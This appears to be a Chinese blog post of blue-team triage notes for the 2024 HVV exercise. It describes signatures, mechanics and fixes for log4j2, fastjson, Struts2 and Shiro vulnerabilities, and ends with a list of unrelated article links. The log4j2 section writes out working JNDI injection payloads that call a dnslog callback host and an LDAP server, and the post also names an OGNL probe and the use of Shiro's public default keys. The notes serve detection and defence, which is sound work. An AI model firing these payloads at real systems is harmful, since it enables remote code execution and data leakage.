当前位置：首页 > news >正文

2024HVV行动-进军蓝中研判（log4j2、fastjson、Struts2、Shiro）

news 2025/7/8 0:18:28

1、log4j2

特征：

恶意请求中包含 JNDI 协议地址，如"ldap://"、"rmi://"等，被 log4j2 解析为 JNDI 查找。

原理：

在日志输出中，未对字符进行严格的过滤，执行了 JNDI 协议加载的远程恶意脚本，从而造成远程代码执行。

影响：

严重的 RCE，2.0 ≤ Apache Log4j2 < 2.15.0-rc2

攻击字段：

${jndi:ldap://${sys:java.version}.7fprj5.dnslog.cn}（手动测试）

${jndi:ldap://192.168.249.128:1389/h8sgrk}（工具生成）

（一般 payload 我们需要进行 URL 编码，传入的命令也需要进行 base64 编码后再解码）

修复：

将 Log4j 升级到已修复漏洞的版本；

如果不需要使用 JndiLookup 插件，可以将其移除或禁用；

配置 log4j2.xml 来限制日志文件的输出路径。

2、fastjson

判断：

构造恶意的 POST 请求，观察服务器返回的错误响应中是否包含了 Fastjson 相关的字样

特征：

开启了自省功能， JSON 数据中包含 @type 字段

原理：

fastjson 在解析 JSON 数据时存在自动类型转换功能（autoType），FastJson 就会自动解析@type 参数字段，利用该功能构造恶意 JSON 数据，使其在反序列化过程中触发漏洞利用链，从而实现恶意代码的执行。

注：@type、自省功能以及 autoType 指的是同一个概念，即 Fastjson 在反序列化 JSON 数据时根据 JSON 数据中的类名来自动实例化对应的 Java 对象的功能。

影响：

fastjson<=1.2.24：反序列化导致任意命令执行

fastjson< =1.2.47：构造特殊的 json 字符串绕过白名单执行任意命令

如何判断攻击成功：

POST 请求中包含了恶意构造的 JSON 数据；

服务器会返回异常的响应（如状态码为 500）；

服务器会返回 Fastjson 相关的字样或错误信息；

与异常的目标 IP 地址或端口建立反向 shell 连接；

异常的恶意文件或数据传输行为。

修复：

将 Fastjson 升级到最新版本；

关闭 AutoType 功能；

在反序列化之前对 JSON 数据进行严格的验证和过滤。

3、Struts2

此漏洞源于 Struts 2 框架中的一个标签处理功能：altSyntax。在开启时，支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理，这允许恶意用户提交一个字符串，通常通过 HTML 文本字段，其中包含一个 OGNL 表达式（如 %{1+1}），如果表单验证失败，服务器将执行该表达式。Struts2 代码执行漏洞均是 OGNL 表达式注入导致。

4、Shiro

介绍：

Apache Shiro是一个开源安全框架，提供身份验证、授权、密码学和会话管理。

原理：

Shiro 在用户登陆时提供可选项 RememberMe，若勾选则下次登陆会携带 cookie 中的 remember me 字段发起请求，就不需要重新输入用户名和密码，用户登录成功后会生成经过 AES 加密和 base64 编码的 cookie。攻击者可以使用 Shiro 的默认密钥构造恶意序列化对象进行编码来伪造用户的 cookie，服务端反序列化时触发漏洞，从而实现命令执行。

特征：

勾选记住密码选项后，点击登录，抓包，观察请求包中是否有 rememberme 字段，响应包中是否有 Set-cookie:rememberMe=deleteMe 字段。

利用：

只要 RememberMe 的 AES 加密密钥泄漏，无论 Shiro 什么版本都会导致反序列化漏洞，AES 是对称加密，加解密是相同的密钥，密钥是写在开源框架的代码中的，我们便可使用公开密钥进行爆破尝试。

修复：

升级Shiro到最新版本；

修改shiro的密钥，不要使用公开密钥；

WAF 拦截 Cookie 中长度过大的 RememberMe 值。

2024HVV行动-进军蓝中研判（log4j2、fastjson、Struts2、Shiro）

1、log4j2

2、fastjson

3、Struts2

4、Shiro

相关文章：

2024HVV行动-进军蓝中研判（log4j2、fastjson、Struts2、Shiro）

亮点抢先看！4月16-17日，百度Create大会开设“AI公开课”，大咖带你打造赚钱工具

【笔记本清灰/实用经验】荣耀Magicbook14-2020款-R5-4500U-清灰实战

如何写好Stable Diffusion的prompt

计算机毕业设计 | SpringBoot+vue 移动端社区物业管理系统（附源码+论文）

玩转C语言——数组初探

Nginx指令配置大全

富格林：安全出金关注可信操作

DELETE、TRUNCATE 和 DROP 在MySQL中的区别及使用示例

程序员应该如何选择职业赛道？

深入浅出Hive性能优化策略

利用卷积神经网络进行人脸识别

固态硬盘有坏道怎么恢复数据固态硬盘坏道怎么修复

adobe animate 时间轴找不到编辑多个帧按钮

5 亿欧元巨额奖励！法国国防部启动量子初创公司项目

Linux：系统初始化，内核优化，性能优化（2）

JS08-DOM节点

2024/3/14打卡棋子（14届蓝桥杯）——差分

A Survey on Multimodal Large Language Models

Java面向对象编程（高级）一

华为云AI开发平台ModelArts

测试微信模版消息推送

日语AI面试高效通关秘籍：专业解读与青柚面试智能助攻

【杂谈】-递归进化：人工智能的自我改进与监管挑战

Linux-07 ubuntu 的 chrome 启动不了

云原生安全实战：API网关Kong的鉴权与限流详解

宇树科技，改名了！

日常一水C

从零开始了解数据采集（二十八）——制造业数字孪生

js 设置3秒后执行